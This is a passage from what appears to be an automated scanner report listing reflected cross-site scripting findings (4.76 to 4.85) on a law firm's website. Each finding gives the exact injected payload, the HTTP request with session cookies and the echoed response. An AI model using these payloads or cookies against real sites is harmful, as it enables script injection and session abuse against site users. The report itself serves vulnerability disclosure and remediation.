document.aspnetForm.action = '/biographies/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/biographies/Search.aspx?c3b19'-alert(1)-'10a178ca3f5=1';//]]>
...[SNIP]...

4.76. http://www.cov.com/diversityoverview [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /diversityoverview

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c748'-alert(1)-'750bc24037f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /diversityoverview?8c748'-alert(1)-'750bc24037f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:34:39 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1151; path=/
Set-Cookie: PortletId=1142501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17851


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Overview</title>
<meta name="langu
...[SNIP]...
.aspnetForm.action = '/diversityoverview/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/diversityoverview/Diversity.aspx?8c748'-alert(1)-'750bc24037f=1';//]]>
...[SNIP]...

4.77. http://www.cov.com/diversityupdate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /diversityupdate

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2d31'-alert(1)-'bf8e984b8ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /diversityupdate?c2d31'-alert(1)-'bf8e984b8ec=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:46:43 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1156; path=/
Set-Cookie: PortletId=1147501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14611


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Diversity Update</title>
<meta nam
...[SNIP]...
ment.aspnetForm.action = '/diversityupdate/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/diversityupdate/Diversity.aspx?c2d31'-alert(1)-'bf8e984b8ec=1';//]]>
...[SNIP]...

4.78. http://www.cov.com/extranet [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /extranet

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f529'-alert(1)-'c70c33782c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /extranet?6f529'-alert(1)-'c70c33782c6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:33:16 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1260; path=/
Set-Cookie: PortletId=1254901; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11206


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP</title>
<meta name="language" content="7483b893-
...[SNIP]...
A[
document.aspnetForm.action = '/extranet/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/extranet/GeneralPageData.aspx?6f529'-alert(1)-'c70c33782c6=1';//]]>
...[SNIP]...

4.79. http://www.cov.com/firmoverview [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /firmoverview

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d58f'-alert(1)-'8538235fe28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /firmoverview?9d58f'-alert(1)-'8538235fe28=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:33:49 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1144; path=/
Set-Cookie: PortletId=1135501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17085


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | About the Firm | Firm Overview</title>
<meta n
...[SNIP]...
ocument.aspnetForm.action = '/firmoverview/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/firmoverview/AboutSection.aspx?9d58f'-alert(1)-'8538235fe28=1';//]]>
...[SNIP]...

4.80. http://www.cov.com/forum [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /forum

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb6be'-alert(1)-'7a5f32d74e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum?cb6be'-alert(1)-'7a5f32d74e6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:47:41 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1169; path=/
Set-Cookie: PortletId=1162901; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14641


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Women's Forum</title>
<meta name
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/forum/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/forum/Diversity.aspx?cb6be'-alert(1)-'7a5f32d74e6=1';//]]>
...[SNIP]...

4.81. http://www.cov.com/honorsrankings [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /honorsrankings

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4088'-alert(1)-'6fb7096a36d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /honorsrankings?f4088'-alert(1)-'6fb7096a36d=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:42 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1145; path=/
Set-Cookie: PortletId=1136501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18735


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Honors & Rankings</title>
<meta name="language
...[SNIP]...
ent.aspnetForm.action = '/honorsrankings/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/honorsrankings/AboutSection.aspx?f4088'-alert(1)-'6fb7096a36d=1';//]]>
...[SNIP]...

4.82. http://www.cov.com/leadersindiversity [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /leadersindiversity

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cac5'-alert(1)-'90719ebe248 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /leadersindiversity?1cac5'-alert(1)-'90719ebe248=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:45:44 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1152; path=/
Set-Cookie: PortletId=1143501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14970


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Leaders in Diversity</title>
<meta
...[SNIP]...
spnetForm.action = '/leadersindiversity/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/leadersindiversity/Diversity.aspx?1cac5'-alert(1)-'90719ebe248=1';//]]>
...[SNIP]...

4.83. http://www.cov.com/legalnotices [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /legalnotices

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0792'-alert(1)-'83d5d12175f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /legalnotices?a0792'-alert(1)-'83d5d12175f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:36 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1165; path=/
Set-Cookie: PortletId=1156501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14448


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Legal Notices</title>
<meta name="language" co
...[SNIP]...
ment.aspnetForm.action = '/legalnotices/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/legalnotices/GeneralPageData.aspx?a0792'-alert(1)-'83d5d12175f=1';//]]>
...[SNIP]...

4.84. http://www.cov.com/mclarty [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /mclarty

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 354a9'-alert(1)-'6c85014edb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mclarty?354a9'-alert(1)-'6c85014edb2=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:44:27 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1407; path=/
Set-Cookie: PortletId=4044201; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | McLarty Associates</title>
<meta name="languag
...[SNIP]...
[CDATA[
document.aspnetForm.action = '/mclarty/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/mclarty/AboutSection.aspx?354a9'-alert(1)-'6c85014edb2=1';//]]>
...[SNIP]...

4.85. http://www.cov.com/news/detail.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /news/detail.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b350e'-alert(1)-'c5433843e1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

